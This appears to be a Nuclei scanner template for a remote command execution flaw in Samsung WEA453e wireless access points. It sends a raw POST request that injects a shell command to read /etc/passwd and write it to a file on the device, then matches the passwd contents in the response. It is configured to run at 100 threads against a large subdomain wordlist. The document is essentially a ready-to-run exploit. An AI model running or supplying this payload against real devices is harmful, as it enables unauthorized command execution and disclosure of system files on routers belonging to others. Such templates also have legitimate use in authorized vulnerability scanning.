id: samsung-wlan-ap-rce

info:
  name: Samsung Wlan AP (WEA453e) RCE
  author: pikpikcu
  severity: critical
  reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
  tags: xss,samsung,rce

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /(download)/tmp/poc.txt HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

        command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
          - "bin:.*:1:1"
        part: body

      - type: status
        status:
          - 200
